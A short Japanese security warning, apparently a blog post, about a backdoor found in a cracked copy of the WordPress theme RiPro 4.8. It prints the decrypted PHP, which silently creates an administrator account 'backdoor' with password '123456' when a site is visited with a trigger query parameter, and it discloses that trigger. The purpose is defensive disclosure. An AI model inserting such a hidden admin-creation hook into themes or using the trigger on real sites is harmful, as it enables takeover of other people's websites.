riproテーマは中国人が開発した有料テーマです。多くのウェブマスターがriproテーマを好みますが、正規版を購入するのはもったいないと感じ、ネット上でriproテーマのクラック版をダウンロードします。最新のriproテーマ4.8クラック版にバックドアが含まれていることが発覚しました。もし使用しているなら、すぐに確認してください。
riproテーマクラック版に含まれるバックドアのファイルは次の場所にあります。
RiPro4.8/wp-content/theme/ripro/inc/class/core.class.php
このファイルは暗号化されています。復号化した内容は以下の通りです:
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
require('wp-includes/registration.php');
if (!username_exists('backdoor')) { //检测是否存在backdoor账户
$user_id = wp_create_user('backdoor', '123456'); //创建账户
$user = new WP_User($user_id);
$user->set_role('administrator'); //设置为管理员权限
}
}
}このコードの役割は次のとおりです。
http(s)://あなたのドメイン/?backdoor=go にアクセスすると、ユーザー名backdoor、パスワード123456の管理者アカウントが自動的に作成されます。
したがって、あなたのサイトの安全のために、自分でサイト構築クラック版テーマは使用しないことをお勧めします。
ネット上でダウンロードしたテーマに暗号化ファイルがある場合、言うまでもなく、高い確率で何かが仕込まれています。
詳細を見るWordPressセキュリティに関する記事をご覧ください。
原文:52破解

